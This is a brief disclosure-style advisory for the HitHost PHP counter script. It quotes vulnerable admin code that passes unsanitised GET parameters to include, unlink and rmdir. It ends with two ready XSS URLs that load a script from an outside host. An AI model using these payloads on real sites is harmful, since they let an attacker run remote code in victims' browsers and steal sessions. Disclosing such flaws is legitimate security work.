??? summary software: HitHost vendors website: http://daverave.64digits.com/index.php?page=hithost versions: <= 1.0.0 class: remote status: unpatched exploit: available solution: not available discovered by: retard risk level: medium ??? description hithost uses $_GET variables in crucial parts of their code causing xss vulnerabilities and _possibly_ allowing users to rm dirs chmoded to 0777 in ./admin/deleteuser.php: 15 else 16 { 17 unlink("users/$deleteuser/password.php"); 18 unlink("users/$deleteuser/counter.php"); 19 rmdir("users/$deleteuser/"); 20 echo "The user <b>$deleteuser</b> has been deleted"; 21 } as you see line 19 raises suspision of the possibility of rming 0777 dirs i've tried it on on my personal server with no sucess, if someone knows of a way let me know. in ./admin/viewuser.php: 6 $viewuser = $_GET['user']; 7 include("users/$viewuser/counter.php"); 8 echo "Username: <b>$viewuser</b><br><br>"; 9 echo "Number of counter hits: $hits<br><br>"; this code is self explanitory, the script does not sanitise the $_GET['user'] allowing users to easily shove xss into the variable. ??? exploit(s) http://example.com/admin/deleteuser.php?user=<script%20src=http://notlegal.ws/xss.js></script> http://example.com/admin/viewuser.php?hits=<script%20src=http://notlegal.ws/xss.js></script> ??? credit author(s): retard email: retard@xxxxxxxxxx
